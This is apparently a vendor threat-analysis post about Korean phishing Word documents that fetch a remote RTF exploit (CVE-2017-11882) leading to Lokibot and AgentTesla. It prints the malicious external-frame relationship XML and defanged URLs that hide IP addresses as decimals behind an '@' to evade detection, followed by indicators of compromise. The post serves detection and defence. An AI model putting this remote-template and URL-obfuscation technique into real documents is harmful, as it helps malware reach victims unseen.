Malicious MS Office Word documents have long been used for the distribution of additional RTF malware by exploiting the fact that Word files allow external connection. However, AhnLab has identified the files that seem to have been made to avoid anti-malware detection are being distributed in Korea.
Similar to past cases, an email disguised as a work email with a Word document attachment is used, but a unique factor exists in the webSettings.xml.rels file which can be identified within the OOXML (Office Open XML) format. The user is automatically redirected to an external URL upon opening the document, and it can be seen from the figure below that the URL is not the typical type that has been distributed in the past.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc" TargetMode="External"/></Relationships>
When the URL is entered into a web browser, the part of URL before the at sign (@) is deleted as shown in Figure 2, and the numbers in the URL after @ is automatically converted into an IP format.
The reason why the part of URL before @ is deleted is as follows: IE versions 3.0–6.0 allowed automatic transmission of user credentials (username:password) to websites that use the default verification method for attempts to enter a URL as shown below.
After a certain security update (MS 832894), the part of URL before @ is ignored. It is deemed that the threat actor exploited this to insert meaningful data (a decimal that can be converted to an IP address) after @. Details related to this process can be viewed in Microsoft Technical Documentation.
- http(s)://username:password@server/resource.txt
The type of URL shown above has been found in multiple Word documents having been distributed in Korea in the past two weeks.
- hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc
- hxxp://sdkjfksfjkjeigufdhgkfdgkhekhjhdfgkdgkhcicivbihberigidfghidgi@3236[13]5982/ego1/document_ego[.]doc
- hxxp://docment_dosc@3323[44]4136/uAuuUASDbjasduhuasduyuASHUDHUSAD
- hxxp://uUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfgh@3221[44]8056/uuUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfghdsfh/zxxaawazzzawwwazzasqwazzas[.]doc
- hxxp://zzxaaqwwweerss@1428[10]6757/zzxaaqwwweerrrrsszzxxzaaqqwwaaaqqzzzssweeessszzaazzswwe/zzxaaqwwweerrrrsszzxxzaaqqwwaaaq[.]doc
- hxxp://zqwerdfgvcbzasdcxssqwsedcfvfrdsaswwszawws@3221[44]8061/zxsswweerrss_zaqsddff_zxcvbfdd_qaszxxcc_zaswssxcv/zqasxxcvvfd_zqwwsdcxv[.]doc
- hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc
- hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@2709[59]7246/ziioooooeroiooisodfo___————sdfjhjjhjhjhhj/ziiuewirisdfjhfjh[.]doc
- hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@1806[43]5509/ziioooooeroiooisodfo__———_—sdfjhjjhjhjhhj/zppolldookfodfdfdf_o[.]doc
- hxxp://zxqwsszzxxcvbfggzzzassqqweezzasszzzewwwsdzzzs@1755[84]8835/zxxswqqeerrdde_sdfsdf_zaqqwaa_zxzxssds/zxccvddqaa_szzxcxccx[.]doc
- hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc
A simple explanation of the conversion principles is as follows: An IP address (IPv4) consists of a combination of 32-bit binaries that are separated into 8 bits (=octet). As it is highly inconvenient to input the actual binary combination (E.g.: 11000000), a decimal (E.g.: 192) that corresponds to the binary is used. The typical web accessing method that we use utilizes domains that correspond to these decimals.
If we approach this process of DNS Lookup in reverse, we can see that the decimal ‘3221457063’ which exists in the external URL is converted into a binary of ‘11000000 00000011 10001000 10100111’ separated into octets, which is then converted to ‘192 3 136 167’ starting from the first digit.
A summary of the conversion process of the external URL is given below.
Such type of URL that is being distributed lately loads the RTF binary on the Word file that has been executed initially and utilizes a past RTF vulnerability known as CVE-2017-11882, ultimately downloading various Infostealer malware such as Lokibot and AgentTesla.
The connection attempts that occur when opening Word files may appear to be the same type of malicious behavior performed by other files that use external URLs, but from an analytical and diagnostic point of view, it is deemed that the threat actor changed the format of the external URL so that the internal file avoids detection.
Users must update V3 to the latest version and refrain from opening document files from unknown sources.
[File Detection]
– Downloader/XML.External.S1942 (2022.10.25.02)
– Trojan/Win.Generic.C5290118 (2022.11.03.00)
– Trojan/Win.MSIL.R510204 (2022.10.27.01)
– RTF/Malform-A.Gen (2018.07.03)
[Behavior Detection]
– Malware/MDP.Download.M1881
[IOC]
MD5
– 655dc599da82d7acfd5f35683c3fe128 : Malicious Word document
– 402d0dc1120c20d21a539bd8d564a6c0 : RTF binary
– 471130cf70d5bc013d818098fb55749a : Lokibot binary
C&C and Download
– hxxp://192.3.136[.]167/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz.doc
– hxxp://192.3.136[.]167/322/vbc.exe
– hxxp://208.67.105[.]162/perez/five/fre.php
– hxxp://192.227.132[.]46/
– hxxp://192.3.101[.]120/
– hxxp://85.31.46[.]5/
– hxxp://192.3.101[.]125/
– hxxp://198.23.187[.]168/
– hxxp://161.129.44[.]62/
– hxxp://107.172.4[.]181/
– hxxp://104.168.32[.]131/
– hxxp://198.23.187[.]168/
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information